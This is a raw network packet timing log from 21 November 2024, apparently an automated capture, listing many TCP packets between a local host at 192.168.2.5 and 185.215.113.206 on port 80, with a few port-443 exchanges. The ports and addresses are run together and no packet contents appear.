                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.410856009 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.410883904 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.411189079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.411952019 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.412031889 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.412072897 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.412072897 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.413064957 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.413136959 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.413167000 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.413420916 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.414195061 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.414268017 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.414299011 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.414439917 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.415333033 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.415400982 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.415402889 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.415630102 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.416507006 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.416570902 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.416693926 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.417618036 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.417751074 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.417815924 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.418783903 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.418843985 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.418873072 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.419116974 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.419914007 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.420027971 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.420049906 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.420253992 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.421061993 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.421133995 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.421186924 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.421226025 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.422305107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.422411919 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.422463894 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.423023939 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.423357964 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.423494101 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.423532963 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.423533916 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.424510002 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.424552917 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.424617052 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.425616026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.425748110 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.425750017 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.426212072 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.426769018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.426870108 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.426887035 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.427054882 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.427922964 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.428004026 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.520339966 CET49802443192.168.2.513.32.99.105
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.567337990 CET4434980213.32.99.105192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.577231884 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.577370882 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.577472925 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.577790976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.577908993 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.577976942 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.578957081 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.579013109 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.579114914 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.579173088 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.580084085 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.580192089 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.580226898 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.580496073 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.581248045 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.581362963 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.581374884 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.581569910 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.582361937 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.582420111 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.582494020 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.583539009 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.583667994 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.583677053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.583760023 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.584661961 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.584779978 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.584793091 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.584937096 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.585809946 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.585860968 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.585901022 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.586042881 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.586916924 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.586966991 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.587064981 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.587162018 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.588090897 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.588149071 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.588181973 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.588243008 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.589241982 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.589301109 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.589334011 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.589430094 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.590392113 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.590485096 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.590502024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.590544939 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.591527939 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.591636896 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.591701031 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.592683077 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.592816114 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.592919111 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.593801022 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.593904018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.593910933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.593945026 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.594953060 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.595001936 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.595006943 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.595110893 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.596116066 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.596277952 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.596342087 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.596434116 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.597249031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.597364902 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.597387075 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.597408056 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.598382950 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.598438978 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.598510027 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.598553896 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.599544048 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.599639893 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.599742889 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.600672007 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.600728035 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.600815058 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.600866079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.601840019 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.601907015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.601938963 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.602215052 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.602986097 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.603043079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.603074074 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.603214979 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.604135036 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.604192972 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.604360104 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.604460001 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.605295897 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.605413914 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.605418921 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.605468035 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.606395006 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.606470108 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.606499910 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.607605934 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.607665062 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.607670069 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.607913971 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.608721018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.608797073 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.608876944 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.609841108 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.609941006 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.609946012 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.610076904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.610959053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.611076117 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.611093998 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.611135960 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.612107038 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.612179995 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.612230062 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.612308025 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.613284111 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.613348007 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.613445044 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.614146948 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.614490986 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.614535093 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.614546061 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.614691019 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.615571976 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.615670919 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.615715981 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.615715981 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.616718054 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.616797924 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.616959095 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.617016077 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.617837906 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.617908001 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.617939949 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.618624926 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.618999958 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.619060993 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.619122028 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.619122028 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.620132923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.620244980 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.620275974 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.620349884 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.621306896 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.621383905 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.621429920 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.622437000 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.622520924 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.622550011 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.622562885 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.623631954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.623729944 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.623895884 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.624716997 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.624792099 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.624815941 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.624881029 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.625854969 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.625905991 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.625977039 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.627022982 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.627093077 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.627125025 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.627301931 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.628170013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.628246069 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.628266096 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.628468037 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.629293919 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.629353046 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.629379034 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.629519939 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.630434036 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.630590916 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.630610943 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.630662918 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.631556988 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.631655931 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.631685019 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.631782055 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.632726908 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.632792950 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.632862091 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.632968903 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.633848906 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.633899927 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.633935928 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.633999109 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.634984016 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.635093927 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.635111094 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.635179043 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.636157990 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.636245966 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.636343002 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.636387110 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.637243032 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.637290955 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.679217100 CET4434984313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.679284096 CET4434984313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.679536104 CET49843443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.679711103 CET49843443192.168.2.513.107.246.45
